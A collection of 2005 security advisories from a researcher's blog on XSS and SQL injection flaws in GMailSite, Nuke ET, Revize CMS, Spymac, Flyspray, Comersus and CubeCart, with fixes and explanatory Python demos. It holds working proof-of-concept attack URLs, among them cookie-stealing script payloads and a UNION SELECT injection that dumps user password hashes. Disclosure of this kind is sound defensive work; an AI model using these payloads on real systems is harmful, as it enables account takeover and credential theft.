GMailSite variable Cross-Site Scripting and script injection

Thursday, December 29, 2005
#######################################################
GMailSite variable Cross-Site Scripting and script injection
Vendor URL: http://www.gmailsite.com/
Vendor-specific entry: http://foros.ojobuscador.com/tema1936.html
Advisory: http://lostmon.blogspot.com/2005/12/gmailsite-variable-cross-site.html
Vendor notified: yes   Exploit available: yes
OSVDB ID: 22083, 22095
Secunia: SA18155
BID: 16081
########################################################

GMailSite is a script that lets you use your GMail account to
build a web page on which every attachment of the messages kept
under a given label in that mail account is published.

GMailSite contains a flaw that allows a remote cross-site
scripting attack. The flaw exists because the application does
not validate the 'lng' variable when it is submitted to the
index.php script. An attacker can therefore craft a URL that
executes arbitrary script in a user's browser within the trust
relationship between the browser and the server, leading to a
loss of integrity.

When HTML or JavaScript is injected through the 'lng' variable,
the value is written into a cookie and the injected code runs
every time the user clicks a link in the GMailSite page; it only
stops when the user selects another language, which overwrites
the cookie. Because the value is stored and reused rather than
merely reflected once, the flaw is also a possible script
insertion and a possible local file inclusion.

#################
Versions affected
#################

GMailSite

GmailSite 1.0.4
GmailSite 1.0.3
GmailSite 1.0.2
GmailSite 1.0.1
GmailSite 1.0

GFHost

GFHost 0.4.2
GFHost 0.4.1
GFHost 0.4
GFHost 0.3
GFHost 0.2
GFHost 0.1.1

#################
Solution
#################

No solution at this time !!!

#############
Timeline
#############

Discovered: 13-11-2005
Vendor notify: 28-12-2005
Vendor response:28-12-2005
Disclosure:29-12-2005

##################
Example
##################

http://[VICTIM]/?lng=es"><script>alert(document.cookie)</script>
http://[VICTIM]/index.php?lng=es"><script>alert(document.cookie)</script>
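The cookie persistence described above, as an added example that is not GMailSite's code: a toy page stores the language code from 'lng' in a cookie and echoes it into a link on every request, first as the advisory describes the flaw, then with the fix a language selector should have (an allowlist of known codes, with attribute encoding on output as a second layer). The language list, the host name and the link markup are assumptions made for the example.

```python
# Added example; not GMailSite's code. Models the 'lng' flow from the advisory:
# the value is stored in a cookie and reflected into markup on every page view.
import html
from urllib.parse import parse_qs, urlsplit

# Assumed for this example: GMailSite's real language list is not on the page.
KNOWN_LANGUAGES = {"en", "es", "de", "fr"}
# The advisory's payload, minus the URL prefix.
PAYLOAD = 'es"><script>alert(document.cookie)</script>'


def lng_from_url(url: str) -> str:
    """Extract the raw 'lng' query parameter (percent-escapes decoded, nothing else)."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("lng", [""])[0]


def render_vulnerable(lng: str, cookies: dict) -> str:
    """As described: any 'lng' value is persisted, then echoed raw into a link."""
    if lng:
        cookies["lng"] = lng
    current = cookies.get("lng", "en")
    # Inside a double-quoted attribute, a value starting with '">' closes the
    # tag, and everything after it is parsed as new markup.
    return f'<a href="index.php?lng={current}">language</a>'


def render_fixed(lng: str, cookies: dict) -> str:
    """A language code is an enum: accept only known codes, and still encode
    the stored value on output in case the cookie was set some other way."""
    if lng in KNOWN_LANGUAGES:
        cookies["lng"] = lng
    current = cookies.get("lng", "en")
    return f'<a href="index.php?lng={html.escape(current, quote=True)}">language</a>'


def script_injected(page: str) -> bool:
    """True when a raw <script> tag made it into the rendered page."""
    return "<script>" in page


def demo() -> dict:
    """Walk the advisory's scenario: inject once, then keep clicking."""
    cookies = {}
    url = "http://gmailsite.example/index.php?lng=" + PAYLOAD  # assumed host
    first = render_vulnerable(lng_from_url(url), cookies)
    later = render_vulnerable("", cookies)              # plain click, no lng
    reset = render_vulnerable("en", cookies)            # picking another language
    safe = {}
    fixed = render_fixed(PAYLOAD, safe)
    return {
        "fires_on_injection": script_injected(first),
        "fires_on_later_click": script_injected(later),
        "stops_after_language_change": not script_injected(reset),
        "fixed_rejects_payload": not script_injected(fixed) and "lng" not in safe,
    }


if __name__ == "__main__":
    print(demo())
```

The allowlist is the real fix here: a language code has a small known set of valid values, so anything else is rejected before it reaches the cookie. The output encoding in render_fixed is defence in depth for the case where the cookie was written by some other path.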

##################### €nd ###############

Thanks to estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Nuke ET 'search' module 'query' variable SQL injection

Monday, November 21, 2005
###############################################
Nuke ET 'search' module 'query' variable SQL injection
Vendor URL: www.truzone.org
Exploit available: yes   Vendor notified: yes
Advisory: http://lostmon.blogspot.com/2005/11/nuke-et-search-module-query-variable.html
OSVDB ID: 21002
Secunia: SA17638
BID: 15519
################################################

Nuke ET has a flaw which can be exploited by malicious people to
conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

Nuke ET 3.2
Prior versions are possibly affected as well.

##################
solution:
###################

The vendor has released a fix:

http://www.truzone.org/modules.php?name=DescNuke&d_op=getit&lid=1557

Apply the fix as soon as possible.

####################
Timeline
####################

discovered:21-11-2005
vendor notify:21-11-2005
vendor response:21-11-2005
vendor fix:21-11-2005
disclosure:21-11-2005

###################
example:
###################

Go to

http://[Victim]/modules.php?name=Search

and enter this proof of concept in the search box:

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

The quote and parenthesis close the LIKE predicate of the search
query, the UNION appends a ten-column row per user taken from
nuke_users, and the trailing /* comments out the rest of the
statement, so every user's password hash is displayed in the
search results.
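As an added example (not Nuke ET's code; its real query is not on the page), the query shape this payload implies, rebuilt on an in-memory SQLite database: a ten-column search over a constructed nuke_stories table with a parenthesised LIKE predicate, so that s%') closes the predicate, UNION SELECT appends one row per user from a constructed nuke_users table, and /* swallows the remainder. The parameterised version beside it treats the whole string as data. Column names, the ORDER BY clause and the sample rows are constructed for the example.

```python
# Added example; not Nuke ET's code. The query shape is inferred from the
# advisory's payload (a parenthesised LIKE predicate and a ten-column SELECT);
# table layouts and rows below are constructed for the demonstration.
import sqlite3

PAYLOAD = ("s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 "
           "FROM nuke_users/*")

COLUMNS = "sid, catid, aid, title, time, hometext, bodytext, comments, counter, topic"


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the Nuke ET database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.executescript(f"""
        CREATE TABLE nuke_stories({COLUMNS});
        CREATE TABLE nuke_users(user_id, username, user_password);
        INSERT INTO nuke_stories VALUES
            (1, 0, 'editor', 'Site news', '2005-11-21', 'teaser', 'body', 0, 0, 1);
        INSERT INTO nuke_users VALUES
            (2, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def search_vulnerable(db: sqlite3.Connection, query: str) -> list:
    """String-built query. The payload's  %')  terminates the LIKE pattern and
    the parenthesis, UNION SELECT adds rows of the same width from another
    table, and the unterminated /* comments out the ORDER BY that follows."""
    sql = (f"SELECT {COLUMNS} FROM nuke_stories "
           f"WHERE (title LIKE '%{query}%') ORDER BY time DESC")
    return db.execute(sql).fetchall()


def search_fixed(db: sqlite3.Connection, query: str) -> list:
    """Bound parameter: quotes and parentheses in the input are just characters.
    Note that % and _ remain LIKE wildcards; escape them too if that matters."""
    sql = (f"SELECT {COLUMNS} FROM nuke_stories "
           "WHERE (title LIKE ?) ORDER BY time DESC")
    return db.execute(sql, ("%" + query + "%",)).fetchall()


def leaked_credentials(rows: list) -> list:
    """Rows the UNION smuggled in carry the literal 0 in the sid column, with
    the username in the 'aid' slot and the password hash where the title goes,
    which is exactly what a search results page then prints."""
    return [(row[2], row[3]) for row in rows if row[0] == 0]


if __name__ == "__main__":
    db = build_db()
    print(leaked_credentials(search_vulnerable(db, PAYLOAD)))   # the admin hash
    print(search_fixed(db, PAYLOAD))                            # []
```

The column count matters: the payload's ten values only work because the original SELECT returns ten columns, which is what an attacker enumerates first (by adding values until the UNION stops erroring). With a bound parameter the database never sees the quote as syntax, so the column count is irrelevant.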

#################### €nd ########################

Thanks to estrella for being my light
Thanks to Truzone
Thanks to RiXi
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Revize(r) CMS SQL information disclosure and XSS

Wednesday, November 16, 2005
#######################################################
Revize(r) CMS SQL information disclosure and XSS
Vendor URL: http://www.idetix.com
Advisory: http://lostmon.blogspot.com/2005/11/revizer-cms-sql-information-disclosure.html
Vendor notified:    Exploit available: yes
OSVDB ID: 20918, 20919, 20920, 20921, 20922
SecurityTracker: 1015231
Secunia: SA17623
BID: 15481, 15482, 15484
#######################################################

The Revize(r) Web Content Management System enables
non-technical content contributors to quickly and easily
keep their Web Pages up-to-date. Revize can be applied
to a sophisticated, mature site or to the development of
a new Web Site from the ground up. And Revize is powerful
enough to manage Web content for any large organization.
Or, Revize can be localized into one or more departments.

Input passed to the "query" parameter of "query_results.jsp"
isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.

This may allow a remote attacker to execute or manipulate SQL
queries in the backend database.

A remote user can also obtain sensitive data about the target
system by requesting 'revize.xml' in the 'conf' directory
directly; the usual URL for this flaw is:
http://[victim]/revize/conf/

#################
version
#################

Unknown version of Revize(r) CMS

##################
solution
##################

No solution at this time.

###################
Timeline
###################

Discovered: 02-11-2005
vendor notify:14-11-2005
vendor response:
disclosure:16-11-2005

#######################
examples
#######################

SQL command:

http://[Victim]/revize/debug/query_results.jsp?
webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_results.jsp?query=
select%20*%20from%20pbpublic.rSubjects

http://[Victim]/revize/debug/query_input.jsp?
table=rSubjects&apptable&webspace=REVIZE

Admin bypass?

http://[Victim]/revize/debug/

This URL presents a login form, but clicking any of the links
on it returns relevant information about the site without a
login:


http://[Victim]/revize/debug/apptables.html
http://[Victim]/revize/debug/main.html

#####################
cross site scripting
#####################

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3
Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap
=subject&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp&action=login&resourcetype=security
&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&error=admincenter/login.jsp

http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/
admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=login&resourcetype=security&objectmap
=subject&error=admincenter/login.jsp


################### €nd ############################

Thanks to estrella for being my light

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Spymac Web OS v4 blogs and notes multiple variable XSS

Friday, November 04, 2005
#####################################################
Spymac Web OS v4 blogs and notes multiple variable XSS
Vendor URL: http://www.spymac.com &
http://arnieshwartz.spymac.com/the_spymac_web_os.htm
Advisory: http://lostmon.blogspot.com/2005/11/spymac-web-os-v4-blogs-and-notes.html
Vendor notified: yes   Exploit available: yes
OSVDB ID: 20902, 20903, 20904, 20905, 20906, 20907

#####################################################


Spymac is powered by an integrated collection of applications
(developed in-house) that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.

Spymac has a flaw that allows a remote cross-site scripting attack.
The flaw exists because the application does not validate multiple
variables when they are submitted to multiple scripts. An attacker
can therefore craft a URL that executes arbitrary script in a
user's browser within the trust relationship between the browser
and the server, leading to a loss of integrity.


################
VERSIONS
################

Spymac Web Os 4.0

#########
Solution
#########

No solution at this time

##########
timeline
##########

Discovered : 28 10 2005
Vendor notify: 02 11 2005
Vendor response:
Disclosure : 04-11-2005


###################
EXAMPLES
###################

Some of these require being logged in to exploit.

###########
IN BLOGS
###########

http://[Victim]/blogs/index.php?curr=349030[XSS-CODE]

http://[Victim]/blogs/blog_newentry.php?inspire=134403[XSS-CODE]
&system=blogentries&title=Blogs%20now%20online

http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=
blogentries[XSS-CODE]&title=Blogs%20now%20online

http://[Victim]/blogs/blog_newentry.php?inspire=134403&system=
blogentries&title=Blogs%20now%20online[XSS-CODE]

http://[Victim]/blogs/blog_newentry_comment.php?entry=113733[XSS-CODE]

http://[Victim]/blogs/blog.php?pageid=113733&caldate=1128146400[XSS-CODE]

http://[Victim]/blogs/blog_edit_entry.php?entry=113733[XSS-CODE]

http://[Victim]/blogs/blog.php?pageid=260&label=Cool%20Stuff
&caldate=1128146400[XSS-CODE]

###########
IN NOTES
###########

http://[Victim]/notes/index.php?action=noteform&forwardid=469397[XSS-CODE]
http://[victim]/notes/index.php?action=delete_folder&del_folder=qq[XSS-CODE]
http://[Victim]/notes/index.php?curr=100&isread=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100&dateorder=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100&subjectorder=asc[XSS-CODE]
http://[victim]/notes/index.php?curr=100[XSS-CODE]
http://[victim]/notes/index.php?isread=asc[XSS-CODE]
http://[Victim]/notes/index.php?fromorder=asc[XSS-CODE]
http://[Victim]/notes/index.php?fromorder=asc&action=search_title[XSS-CODE]
http://[Victim]/notes/index.php?action=shownote&noteid=243633[XSS-CODE]
http://[Victim]/notes/index.php?action=noteform[XSS-CODE]&replyid=243633
http://[Victim]/notes/index.php?action=Inbox[XSS-CODE]
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40[XSS-CODE]&action=Inbox
http://[Victim]/notes/index.php?totalnotes=[XSS-CODE]&ppp=10&ppp=30
http://[Victim]/notes/index.php?totalnotes=&ppp=10&ppp=40&totalreplies=asc[XSS-CODE]&action=Inbox
http://[Victim]/notes/index.php?action=noteform&touserid=172195[XSS-CODE]

######################## €nd #########################

Thanks to estrella for being my light

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Flyspray "The bug killer" multiple variable Cross-Site Scripting

Wednesday, October 26, 2005
####################################################
Flyspray "The bug killer" multiple variable Cross-Site Scripting
Vendor URL: http://flyspray.rocks.cc/
Vendor-specific bug report: http://flyspray.rocks.cc/bts/task/703
Advisory: http://lostmon.blogspot.com/2005/10/flyspray-bug-killer-multiple-variable.html
Vendor notified: yes   Exploit available: yes
OSVDB ID: 20326
Secunia: SA17316
BID: 15209
#####################################################

Flyspray is an uncomplicated, web-based bug tracking system for
assisting with software development.

Flyspray "The bug killer" contains a flaw that allows a remote
cross-site scripting attack. The flaw exists because the application
does not validate multiple variables when they are submitted to the
index.php script. An attacker can therefore craft a URL that
executes arbitrary script in a user's browser within the trust
relationship between the browser and the server, leading to a loss
of integrity.

##################
versions
##################

Flyspray 0.9.7
Flyspray 0.9.8
Flyspray 0.9.8 (devel)


##################
solution
##################

Update to version Flyspray 0.9.8 update1

###################
TimeLine
###################

Discovered:20-10-2005
Vendor notify:24-10-2005
Vendor response:25-10-2005
Disclosure:26-10-2005


####################
Examples
####################

http://[victim]/index.php?PHPSESSID=270ca5a0f7c1e5b2fd4c
52b34cdfe546&tasks=&project=1&string=lala&type=&sev=&due=
&dev=&cat=&status=&perpage=20

The PHPSESSID, tasks, string, type, sev, due and dev variables
are affected by XSS flaws.

http://[victim]/index.php?tasks=all%22%3E%3Cscript
%3Ealert%28%29%3C%2Fscript%3E&project=0

The tasks variable is affected.

http://[victim]/index.php?order=sev&project=1&tasks=&type=
&sev=&dev=&cat=&status=&due=&string=&perpage=20&pagenum=0&
sort=desc&order2=&sort2=desc

The tasks, type, due, string and sort2 variables are
affected by XSS flaws.

########################## €nd #############################

Thanks to estrella for being my light
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Comersus BackOffice Plus Cross site scripting

Sunday, October 16, 2005
#####################################################
Comersus BackOffice Plus Cross site scripting
Vendor URL: http://www.comersus.com/demo.html
Advisory: http://lostmon.blogspot.com/2005/10/comersus-backoffice-plus-cross-site.html
Vendor notified: yes   Exploit available: yes
OSVDB ID: 20032
Secunia: SA17219
SecurityTracker: 1015064
BID: 15118
######################################################


Comersus BackOffice Plus contains a flaw that allows a remote
cross-site scripting attack. The flaw exists because the
application does not validate several variables when they are
submitted to the comersus_backoffice_searchItemForm.asp script.
An attacker can therefore craft a URL that executes arbitrary
script in a user's browser within the trust relationship between
the browser and the server, leading to a loss of integrity.

#############
version:
##############

Comersus Backoffice plus

###########
solution:
###########

No solution was available at this time.


####################
Timeline
####################

discovered: 24-09-2005
vendor notify:28-09-2005
vendor response:28-09-2005
vendor-specific bug report: 7-10-2005
Vendor response:-----------
disclosure: 16-10-2005

##################
Proof of concept:
##################

You must be logged in to exploit this flaw.

http://[victim]/backOfficePlus/comersus_backoffice_searchItemForm.asp?
forwardTo1=[XSS-CODE]comersus_backoffice_listAssignedCategories.asp&
forwardTo2=[XSS-CODE]&nameFT1=[XSS-CODE]Select&nameFT2=[XSS-CODE]

All of these variables (forwardTo1, forwardTo2, nameFT1 and
nameFT2) are vulnerable to cross-site scripting.

##################### €nd #####################

Thanks to estrella for being my light
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

CubeCart™ 3.0.3 multiple variable Cross site scripting

Wednesday, September 28, 2005
################################################
CubeCart™ 3.0.3 multiple variable Cross site scripting
Vendor URL: www.cubecart.com
Bug report: http://bugs.cubecart.com/?do=details&id=363
Advisory: http://lostmon.blogspot.com/2005/09/cubecart-303-multiple-variable-cross.html
Vendor confirmed: yes   Exploit available: yes
Fix available: yes
OSVDB ID: 19860, 19861
SecurityTracker: 1014984
BID: 14962
################################################

CubeCart contains a flaw that allows a remote cross-site scripting
attack. The flaw exists because the application does not validate
the 'redir' variable submitted to cart.php (act=reg and act=login)
and the 'searchStr' variable submitted to index.php. An attacker
can therefore craft a URL that executes arbitrary script in a
user's browser within the trust relationship between the browser
and the server, leading to a loss of integrity.

###############
VERSIONS
###############

CubeCart™ 3.0.3 vulnerable
CubeCart™ 3.0.4 not vulnerable

#################
Timeline
#################

Discovered: 24 sep 2005
vendor notify: 24 sep 2005
Vendor response:26 sep 2005
Solution: 28 sep 2005
Disclosure:24 sep 2005
Public disclosure: 28 sep 2005

###############
Examples:
###############

http://[victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt
by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH
QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ
XdDYXQmYW1wO1N1Ym1pdD1Hbw==[XSS-CODE]

http://[victim]/cc3/cart.php?act=reg&redir=[XSS-CODE]


http://[victim]/cc3/index.php?searchStr=%3D%22%3E%3Cscript
%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat
&Submit=Go

http://[victim]/cc3/index.php?act=login&redir=L3NpdG
UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb
2NJZD0x[XSS-CODE]

#############
SOLUTION
#############

The vendor has released a fix; the latest version of CubeCart
can be downloaded from:

http://www.cubecart.com/site/forums/index.php?download=222

Thanks to the whole CubeCart team, they did a very good job!

################################################
MANUAL FIX
################################################
///////////////////////////////////////
// 1. Open: /includes/content/reg.inc.php
////////

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 123:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$redir = base64_decode($_GET['redir']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$redir = base64_decode(treatGet($_GET['redir']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 170:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$reg->assign("VAL_ACTION","cart.php?act=reg&
redir=".$_GET['redir']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$reg->assign("VAL_ACTION","cart.php?act=reg&
redir=".treatGet($_GET['redir']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


///////////////////////////////////////
// 2. Open: /includes/content/login.inc.php
////////


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 55:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

header("Location: ".str_replace("&amp;","&",
base64_decode($_GET['redir'])));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

header("Location: ".str_replace("&amp;","&",
base64_decode(treatGet($_GET['redir']))));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 74:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$login->assign("VAL_SELF",$_GET['redir']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$login->assign("VAL_SELF",treatGet($_GET['redir']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


///////////////////////////////////////
// 3. Open: /includes/boxes/searchForm.inc.php
////////

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 40:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$box_content->assign("SEARCHSTR",$_GET['searchStr']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$box_content->assign("SEARCHSTR",treatGet($_GET['searchStr']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


///////////////////////////////////////
// 4. Open: /includes/content/viewCat.inc.php
////////

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 108:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$searchwords = split ( "[ ,]", $_GET['searchStr']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$searchwords = split ( "[ ,]", treatGet($_GET['searchStr']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 308:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$view_cat->assign("TXT_NO_PRODUCTS",$lang['front']['viewCat']['no_products_match']." ".$_GET['searchStr']);

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$view_cat->assign("TXT_NO_PRODUCTS",$lang['front']['viewCat']['no_products_match']." ".treatGet($_GET['searchStr']));

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


///////////////////////////////////////
// 5. Open: /includes/functions.inc.php
////////


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
At around line 25 find:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

| functions.inc.php
| ========================================
| Core Frontend Functions
+----------------------------------------------
*/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Directly under this add:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

//////////////////////////////////
// treat GET vars stop XSS
////////
function treatGet($text){

	// Strip backslashes. As printed on the blog page the pattern had lost its
	// escaping ("/(\)/si", an unclosed group that PCRE rejects, which would make
	// preg_replace() return NULL); this is the escaped form for a literal backslash.
	$text = preg_replace("/(\\\\)/si", "", "$text");
	// Drop HTML tags, then any remaining quote, angle-bracket or backslash
	// characters. Note that this deletes data instead of encoding it on output.
	$text = strip_tags($text);
	$text = str_replace(array("'","\"",">","<","\\"), "", $text);
	return $text;

}



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
At around line 384 find:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

function currentPage(){

$currentPage = $_SERVER['PHP_SELF'];

if (isset($_SERVER['QUERY_STRING'])) {

$currentPage .= "?" . htmlentities($_SERVER['QUERY_STRING']);

}

return $currentPage;

}


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace this with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

function currentPage(){

$currentPage = $_SERVER['PHP_SELF'];

if (isset($_SERVER['QUERY_STRING'])) {

$currentPage .= "?" . htmlentities(treatGet($_SERVER['QUERY_STRING']));

}

return $currentPage;

}

///////////////////////////////////////
// 6. Open: /includes/ini.inc.php
////////

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Find at around line 108:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$ini['ver'] = '3.0.3';

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Replace with:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

$ini['ver'] = '3.0.4';

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Save, close and upload this file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// end of manual fix :O)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
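The manual fix's treatGet() is a character-stripping filter: it deletes quotes, angle brackets and backslashes from the input rather than encoding them on output. Below, as an added example that is not CubeCart's code, a Python port of that function sits beside htmlspecialchars-style attribute encoding so the two can be compared on the advisory's searchStr payload and on ordinary input. The search-box markup is an assumption, and the strip_tags() stand-in is a rough approximation of PHP's.

```python
# Added example; not CubeCart's code. Port of the manual fix's treatGet() next
# to output encoding, compared on the advisory's searchStr payload.
import html
import re

ATTACK = '"><script>alert(document.cookie)</script>'


def treat_get(text: str) -> str:
    """Python port of treatGet(): remove backslashes, then tags, then any
    remaining quote, angle-bracket or backslash characters. Data is deleted."""
    text = text.replace("\\", "")                 # the preg_replace step
    text = re.sub(r"<[^>]*>", "", text)           # rough stand-in for strip_tags()
    for ch in ("'", '"', ">", "<", "\\"):         # the str_replace step
        text = text.replace(ch, "")
    return text


def encode_attr(text: str) -> str:
    """htmlspecialchars-style encoding for a double-quoted attribute value.
    Nothing is deleted; the browser shows the original text."""
    return html.escape(text, quote=True)


def search_box(value: str, sanitise) -> str:
    """Assumed shape of the searchForm box: value lands in a quoted attribute."""
    return '<input type="text" name="searchStr" value="' + sanitise(value) + '">'


def tag_count(markup: str) -> int:
    """Number of tags a browser would see; the search box alone is one."""
    return len(re.findall(r"<[a-zA-Z/][^>]*>", markup))


def round_trips(text: str) -> bool:
    """Does the user's input survive encoding once the browser decodes it?"""
    return html.unescape(encode_attr(text)) == text


if __name__ == "__main__":
    raw = search_box(ATTACK, lambda v: v)
    print(tag_count(raw), tag_count(search_box(ATTACK, treat_get)),
          tag_count(search_box(ATTACK, encode_attr)))           # 3 1 1
    print(treat_get("O'Reilly"), "|", encode_attr("O'Reilly"))  # OReilly | O&#x27;Reilly
```

Both approaches stop the advisory's payload in this attribute context, but treatGet() does so by destroying input: a search for O'Reilly becomes a search for OReilly, and a backslash in a product name vanishes. Encoding at the point of output keeps the data intact and still renders the payload as harmless text, which is why it is the general fix; note too that treatGet() is applied before base64_decode() on 'redir', so it only filters what is appended raw to the base64 string, which is what the PoC URLs above do.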

##################### €nd ########################

Thanks to estrella for being my light
Thanks to all the manglers at http://www.osvdb.org

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what moves the mind....

Multiple variable XSS in Spymac Web Os v4.0

Sunday, September 18, 2005
UPDATE 20 sep 2005:
VERSION AFFECTED: Spymac v4

#########################################################
Multiple variable XSS in Spymac Web Os v4.0
Vendor URL: http://www.spymac.com/
Advisory: http://lostmon.blogspot.com/2005/09/multiple-variable-xss-in-spymac-web-os.html
Vendor notified: yes   Exploit available: yes
OSVDB ID: 19613
SecurityTracker: 1014928
#########################################################

Spymac is powered by an integrated collection of applications
(developed in-house) that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.

Spymac has a flaw that allows a remote cross-site scripting attack.
The flaw exists because the application does not validate some
variables when they are submitted to some scripts. An attacker can
therefore craft a URL that executes arbitrary script in a user's
browser within the trust relationship between the browser and the
server, leading to a loss of integrity.

############
Versions affected
############

Spymac web os v4
Spymac Web Os 3.0 beta 190

#########
Solution
#########

No solution was available at this time.

##########
timeline
##########

Discovered : 17 sep 2005
Vendor notify: 17 sep 2005
Vendor response:
Disclosure :17 sep 2005
Public disclosure:17 sep 2005


############
Examples
############

http://[victim]/forums/showthread.php?threadid=195681[XSS-CODE]

